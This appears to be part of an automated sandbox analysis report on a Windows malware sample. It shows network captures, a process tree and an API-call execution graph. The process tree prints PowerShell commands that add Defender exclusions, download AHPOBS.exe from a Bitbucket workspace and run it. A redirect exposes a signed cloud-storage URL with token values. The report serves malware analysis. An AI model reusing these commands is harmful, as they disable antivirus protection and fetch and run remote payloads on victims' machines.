            Dec 24, 2024 08:57:01.565557003 CET49730443192.168.2.4185.166.143.48
            Dec 24, 2024 08:57:01.607328892 CET44349730185.166.143.48192.168.2.4
            Dec 24, 2024 08:57:02.171490908 CET44349730185.166.143.48192.168.2.4
            Dec 24, 2024 08:57:02.171524048 CET44349730185.166.143.48192.168.2.4
            Dec 24, 2024 08:57:02.171602011 CET44349730185.166.143.48192.168.2.4
            Dec 24, 2024 08:57:02.171688080 CET49730443192.168.2.4185.166.143.48
            Dec 24, 2024 08:57:02.171688080 CET49730443192.168.2.4185.166.143.48
            Dec 24, 2024 08:57:02.193012953 CET49730443192.168.2.4185.166.143.48
            TimestampSource PortDest PortSource IPDest IP
            Dec 24, 2024 08:56:59.296551943 CET6230853192.168.2.41.1.1.1
            Dec 24, 2024 08:56:59.433655977 CET53623081.1.1.1192.168.2.4
            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Dec 24, 2024 08:56:59.296551943 CET192.168.2.41.1.1.10x14fbStandard query (0)bitbucket.orgA (IP address)IN (0x0001)false
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Dec 24, 2024 08:56:59.433655977 CET1.1.1.1192.168.2.40x14fbNo error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
            Dec 24, 2024 08:56:59.433655977 CET1.1.1.1192.168.2.40x14fbNo error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
            Dec 24, 2024 08:56:59.433655977 CET1.1.1.1192.168.2.40x14fbNo error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
            • bitbucket.org
            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.449730185.166.143.484437872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            TimestampBytes transferredDirectionData
            2024-12-24 07:57:01 UTC109OUTGET /mynewworkspace123312/scnd/downloads/AHPOBS.exe HTTP/1.1
            Host: bitbucket.org
            Connection: Keep-Alive
            2024-12-24 07:57:02 UTC5911INHTTP/1.1 302 Found
            Date: Tue, 24 Dec 2024 07:57:01 GMT
            Content-Type: text/html; charset=utf-8
            Content-Length: 0
            Server: AtlassianEdge
            Location: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/cf91d8e4-02a0-4397-82bb-bdba0a1c2844/AHPOBS.exe?response-content-disposition=attachment%3B%20filename%3D%22AHPOBS.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHONW5FVM&Signature=JJXPEO4fQt%2Bzh0dXsUTKdQBF0Lo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECAaCXVzLWVhc3QtMSJHMEUCIHrI2CN0BUAlXyNz4D8uaVttL0BaeDCIh6hRdxrGpW5RAiEA5501iqM6WIf8hcqNoGp%2FmC9iIOZ4U6eiZy7SDHVJ15IqsAII6f%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDC3aSctdkzrCCPLu5CqEAkrnwv2oizWrdHjTy9D3WcvZetpeRTHf%2F2vbGhKdZh%2BzuPiDJJGfyZ4PdurHYjkYKcydY9NB62Nm%2FNwRDonFGwhJor1h9d27Q4LsKn9j%2FZKQm7e5JeSZRv%2FqouKhUZssEvleJYs37B4%2BqpdIZcMCP3ObrL%2BM7APYQraHe0NO75oMcJ4A5ciB334p6m63p0pb6F88iA0yVXjUuzLtf7bzk7HLblJSPeoGLQ25fWARODfmagb7TfXY9Ve95f0YbVjRbpIH74XRexmbU0FhGZ2MUavL7TaNPIixeH2iWRSkzTms9OYKIcLGQiw%2FAMPyVi4aEFKYjSN0oDcBFs3Mzw1XzUp9CbObMJvNqbsGOp0BhoFKZTCRJmW36i4TbWQrGs5%2BBHitzunu6vk04BhJgg2vGKQuUV%2FmUl0nL%2FR%2F6oQY%2BIyzZP0NaEedosqPfSXeRwYt%2BBx%2FwgmREHY7EW6 [TRUNCATED]
            Expires: Tue, 24 Dec 2024 07:57:01 GMT
            Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
            X-Used-Mesh: False
            Vary: Accept-Language, Origin
            Content-Language: en
            X-View-Name: bitbucket.apps.downloads.views.download_file
            X-Dc-Location: Micros-3
            X-Served-By: 175e8b01f1f4
            X-Version: c9b3998323c0
            X-Static-Version: c9b3998323c0
            X-Request-Count: 825
            X-Render-Time: 0.0805819034576416
            X-B3-Traceid: 83a9df2626c5443389436cbcc3b1a688
            X-B3-Spanid: 5dc6cd97f4c02eb0
            X-Frame-Options: SAMEORIGIN
            Content-Security-Policy: style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; object-src 'none'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1. [TRUNCATED]
            X-Usage-Quota-Remaining: 998916.943
            X-Usage-Request-Cost: 1106.47
            X-Usage-User-Time: 0.025747
            X-Usage-System-Time: 0.007447
            X-Usage-Input-Ops: 0
            X-Usage-Output-Ops: 0
            Age: 0
            X-Cache: MISS
            X-Content-Type-Options: nosniff
            X-Xss-Protection: 1; mode=block
            Atl-Traceid: 83a9df2626c5443389436cbcc3b1a688
            Atl-Request-Id: 83a9df26-26c5-4433-8943-6cbcc3b1a688
            Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
            Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
            Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
            Server-Timing: atl-edge;dur=191,atl-edge-internal;dur=3,atl-edge-upstream;dur=189,atl-edge-pop;desc="aws-eu-central-1"
            Connection: close


            Click to jump to process

            Click to jump to process

            Click to dive into process behavior distribution

            Click to jump to process

            Target ID:0
            Start time:02:56:53
            Start date:24/12/2024
            Path:C:\Users\user\Desktop\Gq48hjKhZf.exe
            Wow64 process (32bit):false
            Commandline:"C:\Users\user\Desktop\Gq48hjKhZf.exe"
            Imagebase:0x140000000
            File size:123'392 bytes
            MD5 hash:454BF064C19D363B154A419FC69DC693
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            Target ID:1
            Start time:02:56:53
            Start date:24/12/2024
            Path:C:\Windows\System32\cmd.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmp\9A85.bat C:\Users\user\Desktop\Gq48hjKhZf.exe"
            Imagebase:0x7ff68d640000
            File size:289'792 bytes
            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:2
            Start time:02:56:53
            Start date:24/12/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7699e0000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:3
            Start time:02:56:53
            Start date:24/12/2024
            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):false
            Commandline:powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
            Imagebase:0x7ff788560000
            File size:452'608 bytes
            MD5 hash:04029E121A0CFA5991749937DD22A1D9
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:5
            Start time:02:56:57
            Start date:24/12/2024
            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):false
            Commandline:powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";
            Imagebase:0x7ff788560000
            File size:452'608 bytes
            MD5 hash:04029E121A0CFA5991749937DD22A1D9
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:6
            Start time:02:57:01
            Start date:24/12/2024
            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):false
            Commandline:powershell /nop /com "Add-MpPreference -ExclusionProcess C:\Users\user\AppData\Local\Temp\AHPOBS.exe"
            Imagebase:0x7ff788560000
            File size:452'608 bytes
            MD5 hash:04029E121A0CFA5991749937DD22A1D9
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:7
            Start time:02:57:03
            Start date:24/12/2024
            Path:C:\Windows\System32\cmd.exe
            Wow64 process (32bit):false
            Commandline:cmd.exe /c C:\Users\user\AppData\Local\Temp\AHPOBS.exe;
            Imagebase:0x7ff68d640000
            File size:289'792 bytes
            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Reset < >

              Execution Graph

              Execution Coverage:12.7%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:6.6%
              Total number of Nodes:834
              Total number of Limit Nodes:21
              execution_graph 8973 1400138e5 8976 14001364c 8973->8976 8974 140015060 3 API calls 8975 14001449c 8974->8975 8976->8973 8976->8974 8976->8975 9110 140016f67 9111 140016f79 TlsFree 9110->9111 9112 140016faf 9110->9112 9113 140016f87 9111->9113 9114 140016f9b DeleteCriticalSection 9113->9114 9114->9112 8307 140001dea 8308 140001ded 8307->8308 8319 140012360 8308->8319 8311 140012360 HeapFree 8312 140001e11 8311->8312 8313 140012360 HeapFree 8312->8313 8314 140001e23 8313->8314 8315 140012360 HeapFree 8314->8315 8316 140001e35 8315->8316 8317 140012360 HeapFree 8316->8317 8318 140001e47 8317->8318 8320 140012371 HeapFree 8319->8320 8321 140001dfc 8319->8321 8320->8321 8321->8311 9115 140011f69 9116 14001202d 9115->9116 9117 140011f89 9115->9117 9117->9116 9118 140011fc4 9117->9118 9119 140011d30 4 API calls 9117->9119 9120 140011feb 9118->9120 9121 140011fcf memmove 9118->9121 9119->9118 9120->9116 9122 140011ffb 9120->9122 9123 14001202f memmove 9120->9123 9121->9120 9122->9116 9124 140016828 5 API calls 9122->9124 9123->9116 9124->9122 8977 1400016ed 8978 1400016f0 8977->8978 8979 140012360 HeapFree 8978->8979 8980 1400016ff 8979->8980 8981 140011ef4 2 API calls 8980->8981 8982 140001711 8981->8982 8983 140011ef4 2 API calls 8982->8983 8984 140001723 8983->8984 8666 140003c6e 8667 140003c71 8666->8667 8668 140012360 HeapFree 8667->8668 8669 140003c80 8668->8669 8670 140012360 HeapFree 8669->8670 8671 140003c92 8670->8671 8672 140012360 HeapFree 8671->8672 8673 140003ca7 8672->8673 8674 140012360 HeapFree 8673->8674 8675 140003cb9 8674->8675 8676 140010c70 8678 140010c98 8676->8678 8680 140010cd1 8678->8680 8681 140010ceb 8678->8681 8684 140010cd9 8678->8684 8685 1400174e0 8680->8685 8681->8684 8692 140017140 8681->8692 8698 140010f00 8684->8698 8686 140017506 WideCharToMultiByte 8685->8686 8687 14001758d malloc 8685->8687 8686->8687 8690 14001754a malloc 8686->8690 8688 14001759a 8687->8688 8688->8684 8690->8687 8691 14001755d WideCharToMultiByte 8690->8691 8691->8688 8693 140017166 WideCharToMultiByte 8692->8693 8694 1400171f2 8692->8694 8693->8694 8696 1400171ae malloc 8693->8696 8694->8684 8696->8694 8697 1400171bf WideCharToMultiByte 8696->8697 8697->8694 8699 140010f1e 8698->8699 8700 1400126d0 3 API calls 8699->8700 8701 140010d5b 8700->8701 8160 14000e3f0 8161 14000e4ee 8160->8161 8162 14000e40a 8160->8162 8162->8161 8163 14000e483 8162->8163 8164 14000e41a 8162->8164 8177 14000e770 WideCharToMultiByte 8163->8177 8165 14000e451 8164->8165 8166 14000e425 8164->8166 8165->8165 8168 14000e45d WriteFile 8165->8168 8170 14000e620 5 API calls 8166->8170 8174 14000e445 8170->8174 8171 14000e4c5 WriteFile 8173 14000e4dc HeapFree 8171->8173 8172 14000e4b7 8182 14000e620 8172->8182 8173->8161 8176 14000e4bf 8176->8173 8178 14000e7b9 HeapAlloc 8177->8178 8179 14000e4a0 8177->8179 8180 14000e804 8178->8180 8181 14000e7d8 WideCharToMultiByte 8178->8181 8179->8161 8179->8171 8179->8172 8180->8179 8181->8180 8183 14000e644 8182->8183 8184 14000e75e 8182->8184 8185 14000e673 8183->8185 8186 14000e64a SetFilePointer 8183->8186 8184->8176 8187 14000e67e 8185->8187 8188 14000e6ff 8185->8188 8186->8185 8189 14000e6b7 8187->8189 8192 14000e699 memmove 8187->8192 8195 14000ddc0 8188->8195 8189->8176 8191 14000e707 8193 14000e711 WriteFile 8191->8193 8194 14000e739 memmove 8191->8194 8192->8176 8193->8176 8194->8176 8196 14000de04 8195->8196 8197 14000ddd4 WriteFile 8195->8197 8196->8191 8197->8191 8322 14000e1f0 8323 1400112a8 5 API calls 8322->8323 8324 14000e21b 8323->8324 8325 14000e227 CreateFileW 8324->8325 8328 14000e27f 8324->8328 8326 14000e25c 8325->8326 8325->8328 8327 14000e267 HeapAlloc 8326->8327 8326->8328 8327->8328 8702 140014673 8703 140014682 8702->8703 8705 1400146ba 8702->8705 8704 140014747 8705->8704 8706 1400148e1 memmove 8705->8706 8706->8704 9125 140013175 9128 14001317a 9125->9128 9126 140015060 3 API calls 9127 14001449c 9126->9127 9129 14001340c memmove 9128->9129 9130 1400130c8 9128->9130 9129->9130 9130->9126 9130->9127 8333 1400113f8 EnterCriticalSection 8335 140011423 LeaveCriticalSection 8333->8335 8985 14000d8f8 8986 14000d908 8985->8986 8987 14000d90d 8985->8987 8989 140011a50 8986->8989 8990 140011a81 8989->8990 8991 140011a60 8989->8991 8990->8987 8995 140011c48 EnterCriticalSection 8991->8995 8994 140011a65 8994->8990 8996 140011bdc 8994->8996 8995->8994 8999 140011be7 8996->8999 8997 140011c3c 8997->8994 8998 140011c32 LeaveCriticalSection 8998->8997 8999->8997 8999->8998 8156 140010ffc 8157 140011009 8156->8157 8158 14001101f 8156->8158 8157->8158 8159 140011013 TlsFree 8157->8159 8159->8158 9131 140010b7c 9132 140010b85 memset 9131->9132 9133 140010b8d 9131->9133 9132->9133 9134 14000477e 9135 140012360 HeapFree 9134->9135 9136 140004790 9135->9136 9137 140012360 HeapFree 9136->9137 9138 1400047a2 9137->9138 9139 140012360 HeapFree 9138->9139 9140 1400047b4 9139->9140 9141 140012360 HeapFree 9140->9141 9142 1400047c6 9141->9142 9143 140012360 HeapFree 9142->9143 9144 1400047d8 9143->9144 9000 140016700 malloc 8198 140001000 8199 14000101d 8198->8199 8250 140012060 HeapCreate TlsAlloc 8199->8250 8201 14000105b 8253 14000de20 8201->8253 8203 140001065 8256 14000c980 HeapCreate 8203->8256 8205 140001074 8257 14000c07c 8205->8257 8207 140001079 8208 14000b538 memset InitCommonControlsEx CoInitialize 8207->8208 8209 14000107e 8208->8209 8210 140007160 InitializeCriticalSection 8209->8210 8211 140001083 8210->8211 8212 1400120d0 HeapAlloc HeapReAlloc HeapFree 8211->8212 8213 1400010a3 8212->8213 8214 14000ccd8 32 API calls 8213->8214 8215 1400010e6 8214->8215 8216 14000d524 16 API calls 8215->8216 8217 1400010fa 8216->8217 8218 14000d444 11 API calls 8217->8218 8219 14000111e 8218->8219 8220 14000d524 16 API calls 8219->8220 8221 14000112a 8220->8221 8222 14000d444 11 API calls 8221->8222 8223 14000114e 8222->8223 8224 140011d30 HeapAlloc memset HeapFree HeapFree 8223->8224 8225 140001185 8224->8225 8226 1400120d0 HeapAlloc HeapReAlloc HeapFree 8225->8226 8227 1400011a6 8226->8227 8228 14000d524 16 API calls 8227->8228 8229 1400011b2 8228->8229 8230 14000d444 11 API calls 8229->8230 8231 1400011d6 8230->8231 8232 14000c4d0 RemoveVectoredExceptionHandler AddVectoredExceptionHandler 8231->8232 8233 1400011e5 8232->8233 8234 1400121c0 GetLastError TlsGetValue SetLastError 8233->8234 8235 1400011ef 8234->8235 8236 1400121c0 GetLastError TlsGetValue SetLastError 8235->8236 8237 1400011ff 8236->8237 8238 140004211 32 API calls 8237->8238 8239 14000120e 8238->8239 8240 140012210 TlsGetValue HeapAlloc HeapReAlloc 8239->8240 8241 14000121f 8240->8241 8242 1400021ea 51 API calls 8241->8242 8243 140001224 8242->8243 8244 140001236 8243->8244 8246 14000433f 188 API calls 8243->8246 8245 14000593c 232 API calls 8244->8245 8247 14000123b 8245->8247 8246->8244 8248 1400120a0 HeapDestroy TlsFree 8247->8248 8249 140001245 HeapDestroy ExitProcess 8248->8249 8262 140012c50 HeapAlloc HeapAlloc TlsSetValue 8250->8262 8252 14001208c 8252->8201 8263 140011370 HeapAlloc HeapAlloc InitializeCriticalSection 8253->8263 8255 14000de38 8255->8203 8256->8205 8264 1400110dc 8257->8264 8261 14000c0a8 InitializeCriticalSection 8262->8252 8263->8255 8265 1400110fd 8264->8265 8266 140011112 TlsAlloc HeapAlloc TlsSetValue 8265->8266 8267 140011149 TlsGetValue HeapReAlloc TlsSetValue 8265->8267 8266->8267 8268 140011198 8267->8268 8269 14000c08d 8268->8269 8272 140011cb0 HeapAlloc 8268->8272 8271 140011370 HeapAlloc HeapAlloc InitializeCriticalSection 8269->8271 8271->8261 8273 140011cd3 8272->8273 8273->8269 8336 140007a00 8339 140007a50 8336->8339 8340 140007a79 8339->8340 8361 140012630 TlsGetValue 8340->8361 8343 140012630 TlsGetValue 8344 140007a9c 8343->8344 8363 1400126d0 TlsGetValue 8344->8363 8347 140007abf 8353 140007acf 8347->8353 8370 140012850 TlsGetValue 8347->8370 8350 140007c35 8371 140012900 TlsGetValue 8350->8371 8352 140007a1c 8353->8350 8354 140007b20 HeapAlloc 8353->8354 8355 140007b50 8353->8355 8354->8355 8355->8355 8356 140007b91 wcsncpy 8355->8356 8359 140007bac 8355->8359 8356->8359 8357 140007c02 8357->8350 8358 140007c09 HeapFree 8357->8358 8358->8350 8359->8357 8360 140007bdf wcsncpy 8359->8360 8360->8357 8362 140007a92 8361->8362 8362->8343 8364 1400126f4 8363->8364 8365 140012772 8364->8365 8366 14001272d HeapReAlloc 8364->8366 8367 140007ab1 8365->8367 8368 140012793 HeapReAlloc 8365->8368 8366->8367 8367->8347 8369 140012850 TlsGetValue 8367->8369 8368->8367 8369->8347 8370->8353 8371->8352 8372 140008200 8375 140008260 8372->8375 8376 1400082e4 8375->8376 8377 140008397 8376->8377 8378 14000830a 8376->8378 8379 140012630 TlsGetValue 8377->8379 8389 140008363 wcsncpy 8378->8389 8391 140008221 8378->8391 8380 14000839f 8379->8380 8381 1400083ba 8380->8381 8382 1400083aa _wcsdup 8380->8382 8383 140012630 TlsGetValue 8381->8383 8382->8381 8384 1400083c2 8383->8384 8385 1400083d8 8384->8385 8386 1400083cd _wcsdup 8384->8386 8387 140012630 TlsGetValue 8385->8387 8386->8385 8388 1400083e0 8387->8388 8390 1400083eb _wcsdup 8388->8390 8394 1400083f8 8388->8394 8389->8378 8390->8394 8392 1400126d0 3 API calls 8393 140008481 8392->8393 8395 1400084ed wcsncpy 8393->8395 8396 140008488 8393->8396 8399 14000850e 8393->8399 8394->8392 8395->8399 8397 140008575 8396->8397 8398 14000856d free 8396->8398 8400 140008587 8397->8400 8401 14000857f free 8397->8401 8398->8397 8399->8396 8403 1400085c0 wcsncpy 8399->8403 8400->8391 8402 140008591 free 8400->8402 8401->8400 8402->8391 8403->8399 8713 14000d881 8714 14000d89d 8713->8714 8715 14000d8dc 8713->8715 8714->8715 8718 14000d8af 8714->8718 8720 14000d60c 8714->8720 8718->8715 8727 14000d6a0 8718->8727 8732 140016828 8718->8732 8721 14000d656 8720->8721 8725 14000d62f 8720->8725 8722 14000d654 8721->8722 8723 1400116f4 3 API calls 8721->8723 8722->8718 8723->8721 8724 140016bb0 HeapFree 8724->8725 8725->8722 8725->8724 8741 1400116f4 8725->8741 8728 14001147c 4 API calls 8727->8728 8729 14000d6b6 8728->8729 8730 14000d6c2 memset 8729->8730 8731 14000d6d6 8729->8731 8730->8731 8731->8718 8733 140016ba7 8732->8733 8736 140016831 8732->8736 8733->8718 8734 140016ba2 memmove 8734->8733 8735 140016b50 memmove 8735->8736 8736->8735 8737 140016b85 8736->8737 8738 140012360 HeapFree 8736->8738 8740 140016828 wcslen HeapAlloc HeapFree 8736->8740 8748 1400122f0 8736->8748 8737->8733 8737->8734 8738->8736 8740->8736 8742 14001170a EnterCriticalSection 8741->8742 8745 140011714 8741->8745 8742->8745 8743 1400117f1 8743->8725 8744 1400117e7 LeaveCriticalSection 8744->8743 8746 14001177b HeapFree 8745->8746 8747 140011794 8745->8747 8746->8747 8747->8743 8747->8744 8749 140012351 8748->8749 8750 140012306 wcslen HeapAlloc 8748->8750 8749->8736 8752 140012880 8750->8752 8753 1400128a5 8752->8753 8753->8749 8404 140013801 8406 140013810 8404->8406 8405 1400144ee 8409 1400138d8 8405->8409 8410 140015060 8405->8410 8406->8405 8407 14001389e memmove 8406->8407 8406->8409 8407->8409 8411 14001508d 8410->8411 8412 1400150ea memmove 8411->8412 8413 1400150cf memmove 8411->8413 8414 1400150a7 8411->8414 8412->8414 8415 14001510b memmove 8412->8415 8413->8414 8414->8409 8415->8414 8416 140011e0c 8418 140011e56 8416->8418 8418->8418 8419 140011ec4 8418->8419 8420 140011d30 8418->8420 8426 140011ef4 8420->8426 8423 140011d6e HeapAlloc 8424 140011d90 memset 8423->8424 8425 140011dc6 8423->8425 8424->8425 8425->8419 8427 140011d69 8426->8427 8428 140011ef9 8426->8428 8427->8423 8427->8425 8429 140011f38 HeapFree 8428->8429 8431 140016bb0 8428->8431 8429->8427 8433 140016bca 8431->8433 8432 140016ced 8432->8428 8433->8432 8434 140016bb0 HeapFree 8433->8434 8435 140012360 HeapFree 8433->8435 8434->8433 8435->8433 8436 14000bc0c 8437 14000bc19 EnableWindow 8436->8437 8438 14000bc2b 8436->8438 8437->8438 8439 140017410 8440 14001749e malloc 8439->8440 8441 140017430 MultiByteToWideChar 8439->8441 8442 1400174ac 8440->8442 8441->8440 8444 14001745d malloc MultiByteToWideChar 8441->8444 8444->8442 9009 140014d10 9010 140014d32 9009->9010 9012 140014d6a 9009->9012 9011 140015060 3 API calls 9010->9011 9010->9012 9011->9012 9013 140016710 free 9145 140014990 9146 1400149aa 9145->9146 9147 140014a09 9145->9147 9146->9147 9148 1400149df memmove memmove 9146->9148 9148->9147 9149 140012390 HeapFree HeapFree 8754 14000c490 8759 14000c6e0 8754->8759 8757 14000c4c6 8758 14000c4ab GetCurrentProcess TerminateProcess 8758->8757 8762 14000c4f0 8759->8762 8761 14000c499 8761->8757 8761->8758 8763 14000c510 8762->8763 8763->8763 8764 14000c562 RtlLookupFunctionEntry 8763->8764 8765 14000c5b4 RtlLookupFunctionEntry 8764->8765 8768 14000c5f3 8764->8768 8766 14000c680 8765->8766 8765->8768 8766->8761 8767 14000c61b RtlVirtualUnwind 8767->8766 8767->8768 8768->8766 8768->8767 8769 14000c664 RtlLookupFunctionEntry 8768->8769 8770 14000c693 8768->8770 8769->8766 8769->8768 8770->8761 9014 140002914 9015 140012360 HeapFree 9014->9015 9016 140002926 9015->9016 8445 14000281c 8452 140012600 TlsGetValue 8445->8452 8447 140002821 8448 140012360 HeapFree 8447->8448 8449 140002835 8448->8449 8450 140012360 HeapFree 8449->8450 8451 140002847 8450->8451 8452->8447 9017 14001431b 9018 1400144ee 9017->9018 9020 140014324 9017->9020 9019 140015060 3 API calls 9018->9019 9018->9020 9019->9020 8453 140017220 8454 140017250 8453->8454 8454->8454 8455 14001725b MultiByteToWideChar 8454->8455 8456 1400126d0 3 API calls 8455->8456 8457 140017287 MultiByteToWideChar 8456->8457 8771 1400076a0 8772 1400076b4 8771->8772 8774 140007716 8771->8774 8773 140007702 wcsstr 8772->8773 8772->8774 8773->8774 8775 14000bea0 GetWindowThreadProcessId GetCurrentThreadId 8776 14000bf31 8775->8776 8777 14000bec1 IsWindowVisible 8775->8777 8777->8776 8778 14000bece 8777->8778 8779 140011cb0 HeapAlloc 8778->8779 8780 14000bedf GetCurrentThreadId GetWindowLongPtrW 8779->8780 8781 14000bf06 8780->8781 8782 14000bf0a GetForegroundWindow 8780->8782 8781->8782 8782->8776 8783 14000bf15 IsWindowEnabled 8782->8783 8783->8776 8784 14000bf22 EnableWindow 8783->8784 8784->8776 8785 1400034a2 8798 140012600 TlsGetValue 8785->8798 8787 1400034a7 8788 140012360 HeapFree 8787->8788 8789 1400034bb 8788->8789 8790 140012360 HeapFree 8789->8790 8791 1400034cd 8790->8791 8792 140012360 HeapFree 8791->8792 8793 1400034df 8792->8793 8794 140012360 HeapFree 8793->8794 8795 1400034f1 8794->8795 8796 140012360 HeapFree 8795->8796 8797 140003503 8796->8797 8798->8787 8458 140011024 8459 140011032 TlsFree 8458->8459 8460 14001103e 8458->8460 8459->8460 8461 14000e824 8462 14000e8e4 8461->8462 8470 14000fee4 8462->8470 8471 14000ff0b 8470->8471 8472 14000ff47 memmove 8471->8472 8473 14000ff92 8471->8473 8477 14000ea48 8472->8477 8475 14000ff70 8475->8473 8476 14000ea48 memmove 8475->8476 8476->8475 8478 14000ea81 8477->8478 8479 14000ea71 memmove 8477->8479 8478->8475 8479->8478 9164 140010fa8 9165 140010fbe 9164->9165 9166 140010fdd HeapFree 9165->9166 9167 140010fef 9165->9167 9166->9167 8480 140013227 8483 14001322c 8480->8483 8481 140015060 3 API calls 8482 14001449c 8481->8482 8484 14001340c memmove 8483->8484 8485 14001341c 8483->8485 8484->8485 8485->8481 8485->8482 9168 1400021a8 9169 1400021ab 9168->9169 9170 140012360 HeapFree 9169->9170 9171 1400021ba 9170->9171 9172 140012360 HeapFree 9171->9172 9173 1400021cc 9172->9173 9174 140012360 HeapFree 9173->9174 9175 1400021de 9174->9175 8486 14001162c 8491 14001147c 8486->8491 8489 140011646 memset 8490 140011659 8489->8490 8492 1400114a4 8491->8492 8493 14001149a EnterCriticalSection 8491->8493 8494 14001155e HeapAlloc 8492->8494 8498 1400114b1 8492->8498 8493->8492 8495 140011586 HeapAlloc 8494->8495 8494->8498 8495->8498 8496 140011606 8496->8489 8496->8490 8497 1400115fc LeaveCriticalSection 8497->8496 8498->8496 8498->8497 8499 14000b62c 8500 14000b635 HeapFree 8499->8500 8501 14000b647 8499->8501 8500->8501 8808 1400040ac 8809 1400123e0 21 API calls 8808->8809 8810 1400040ce 8809->8810 8811 14000d6a0 5 API calls 8810->8811 8812 1400040da 8811->8812 8821 1400121c0 GetLastError TlsGetValue SetLastError 8812->8821 8814 1400040e4 8822 1400121c0 GetLastError TlsGetValue SetLastError 8814->8822 8816 1400040f8 8823 14000ca00 8816->8823 8820 140004122 8821->8814 8822->8816 8824 14000ca20 8823->8824 8825 1400126d0 3 API calls 8824->8825 8826 14000ca34 8825->8826 8827 14000ca3b memmove 8826->8827 8828 14000410d 8826->8828 8827->8828 8829 140012210 TlsGetValue 8828->8829 8830 140012251 HeapAlloc 8829->8830 8831 140012276 HeapReAlloc 8829->8831 8832 1400122a1 8830->8832 8831->8832 8832->8820 9021 14000432e 9024 140012600 TlsGetValue 9021->9024 9023 140004333 9024->9023 8502 140011a30 InitializeCriticalSection 8302 14000c6b0 8303 14000c6d1 8302->8303 8304 14000c6c0 RemoveVectoredExceptionHandler 8302->8304 8304->8303 8503 140007a30 8504 140007a50 10 API calls 8503->8504 8505 140007a49 8504->8505 8506 140008230 8507 140008260 13 API calls 8506->8507 8508 140008251 8507->8508 9025 140007730 9026 1400077e3 9025->9026 9027 140007743 9025->9027 9027->9026 9028 1400077b5 9027->9028 9029 1400077bc wcsstr 9027->9029 9032 1400085f0 9028->9032 9030 1400077ba 9029->9030 9033 140008617 CharLowerW 9032->9033 9034 14000869f 9032->9034 9036 140008630 9033->9036 9034->9030 9035 14000864c CharLowerW 9035->9036 9036->9034 9036->9035 9037 140008670 CharLowerW CharLowerW 9036->9037 9037->9036 8839 140008eb5 8840 140008ee3 8839->8840 8841 140008ec9 8839->8841 8842 140008ed4 8840->8842 8855 14000afc0 8840->8855 8841->8842 8845 140009da0 8841->8845 8846 140009dc9 8845->8846 8848 140009e0d 8845->8848 8865 14000b510 8846->8865 8848->8848 8849 140009da0 _wcsicmp 8848->8849 8850 140009de0 8848->8850 8851 140009e66 8849->8851 8850->8842 8852 140009da0 _wcsicmp 8851->8852 8854 140009e79 8852->8854 8853 14000b510 _wcsicmp 8853->8854 8854->8850 8854->8853 8856 14000afe9 8855->8856 8858 14000b02d 8855->8858 8857 14000b510 _wcsicmp 8856->8857 8863 14000b000 8857->8863 